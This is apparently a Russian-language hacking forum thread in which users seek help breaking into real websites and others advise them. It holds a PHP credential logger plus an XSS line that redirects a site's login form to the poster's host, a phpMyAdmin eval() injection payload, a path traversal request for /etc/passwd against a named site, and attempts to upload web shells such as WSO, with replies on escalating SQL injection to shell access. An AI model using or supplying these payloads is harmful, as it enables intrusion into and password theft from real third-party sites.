Как составить запрос в sqlmap, чтобы он брал строку из файла и проверял каждую персонально без обращение к google? аналог python sqlmap.py - g
можно вопрос нашел уязвимый сайт , там blind sql injection он медленно подбирает таблицы видимо вслепую) поставил для перебора количество потоков равным 10 current user is dba :true (база оракле) пытаюсь запустать скл шелл пишет operation system shell functionality not yet implemented for oracle) чтото можно сделать?) ато там баз много и юзеров баз много до пенсии будет перебирать )
Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов? Вот мой base.php Code: <? $login = $_POST['username']; $pass = $_POST['password']; $file = "log.txt"; $fop = fopen("$file","a+"); fwrite($fop,"$login;$pass\n"); fclose($fop); ?> Вот сам submit <form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes" onsubmit="return lsSubmit();"> И так обращяюсь к submit. document.getElementById('lsform').action="http://мойхост.ru/base.php?";
Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9 server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo(); Сплоит не работает , ответ SQL-запрос: SELECT `information_schema`.`SCHEMATA` . * FROM `information_schema`.`SCHEMATA` GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME` ORDER BY BINARY `"]) OR eval($_REQUEST[cmd]); //` DESC Ответ MySQL: #1054 - Unknown column '"]) OR eval($_REQUEST[cmd]); //' in 'order clause' как раскрутить помогите и сильно не ругайте я только начинаю.
Как выглядит XSS и где она? Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
Code: http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd Подскажите как можно обойти.
Code: http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php 404 как бэ, да и плюс http://bit.ly/1J4XXyF уже сломали переломали
Что можно с этого поиметь... exception 'Exception' with message 'Disabled' in /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_theme.php:1019 Stack trace: #0 [internal function]: template_preprocess_theme_wallet_info(Array, 'theme_wallet_in...') #1 /var/www/vhosts//includes/theme.inc(710): call_user_func_array('template_prepro...', Array) #2 /tmp/tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u54jkaA.php(25): theme('theme_wallet_in...') #3 /var/www/vhosts//themes/engines/phptal/PHPTAL.php(675): tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u54jkaA(Object(PHPTAL), Object(PHPTAL_Context)) #4 /var/www/vhosts//themes/engines/phptal/phptal.engine(86): PHPTAL->execute() #5 /var/www/vhosts//includes/theme.inc(738): phptal_render_template('sites/all/modul...', Array) #6 /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_room.php(1273): theme('apparat_select') #7 /var/www/vhosts//sites/all/modules/custom/casino/casino.module(318): ctrl_room->http_apparat(Array) #8 [internal function]: casino_menu_callback('room', 'apparat') #9 /var/www/vhosts//includes/menu.inc(350): call_user_func_array('casino_menu_cal...', Array) #10 /var/www/vhosts//index.php(53): menu_execute_active_handler() #11 {main} There is a problem with the phptal theme engine Please refer to the documentation on the PHPTAL project page.
Есть сайт на Drupal в загрузку картинок заливаю shell.php%00ipg заливается.Пробовал ище в коментах exif мини-шелл прописать. Но меняет имя файла, иду по адресу файла открываю и ничего не происходит. Как я понял стоит imagecache drupal можна вообще таким способом залить шелл или мини-шелл? Ище фильтрация на сайте Emphasized <em>Emphasized</em> Emphasized Strong <strong>Strong</strong> Strong Cited <cite>Cited</cite> Cited Coded text used to show programming source code <code>Coded</code> Coded Character Description You Type You Get Ampersand & & Greater than > > Less than < < Quotation mark " "
Не получается залить шелл . Вообщем есть админка на сайте.Админка самописная. Картинки можно заливать .jpg .png .gif ,остальные расширения нельзя, выдаёт ошибки которые появляются прямо в самой админке . Spoiler: Вот ошибки Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 75 Warning: Division by zero in /home/*******/*******/admin/gdResizer.php on line 227 Warning: Division by zero in /home/*******/*******.ru/admin/gdResizer.php on line 228 Warning: imagecreatetruecolor(): Invalid image dimensions in /home/*******/*******.ru/admin/gdResizer.php on line 241 Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /home/*******/*******.ru/admin/gdResizer.php on line 250 Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 107 Пытаюсь залить шелл с расширением .jpg или .png или .gif тоже ошибки . Пробую Shell.php.jpg не катит,даже с %0 . Пробую через Image Manager,выбираю файл shell.php,пишет файл загружен,но его там нет . Пробовал даже .htacces залить,и то не помогает . Есть возможность писать отзывы . Пишу в строку "Автор" - '(кавычку,одинарную),пишу текст,буква d . Вылезает это You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd','2015-08-26 16:58:08')' at line 1 . А что дальше с SQL делать не знаю . Остальные запросы блокирует . Видимо некоторые символы блокирует . На заметку : сайт на .html . Помогите,а то уже нет сил .
Есть sql иньекция - раскручивайте. Может быть будут права через базу залить шелл. Ваш загружаемый файл обрабатывается с помощью библиотеки GD - библиотека php для работы с графическими файлами. Она создает новое корректное изображение с уже существующего. Думаю не получится загрузить другой файл кроме картинки. Просто на сайте нет обработчика ошибок, и включен вывод ошибок То, что сайт на html ничего не значит. Если Вы получили сообщение об ошибке mysql уже заслуживает внимание и может рассматриваться как потенциальная уязвимость. P.S. И дай Вам бог сил. В нашей работе - главное терпение
Помогите разобраться с OpenCart 1.5.4.1 http://www.slideshare.net/DefconRussia/reutov-yunusov-nagibin-random-numbers-take-ii с страницы 46 как я понял нужно скомпилировать на стр 49 Вообще может есть какая то инфа то OpenCart 1.5.4.1
Возможно ли раскрутить Фрагментированную SQL инъекцию Отсутствие фильтрации символа обратного слэша \ http://fortunae-filius.ru/reg.htm
Заливаю Shell WSO через админку . Shell заливал в /news . Составил линку http://********.com/upload/news/wso2.php Вылезает вот это :
Тут pas не поможет, это php расширение интерпретируется как html код, нужно пробывать играться с расширением или путь выше искать...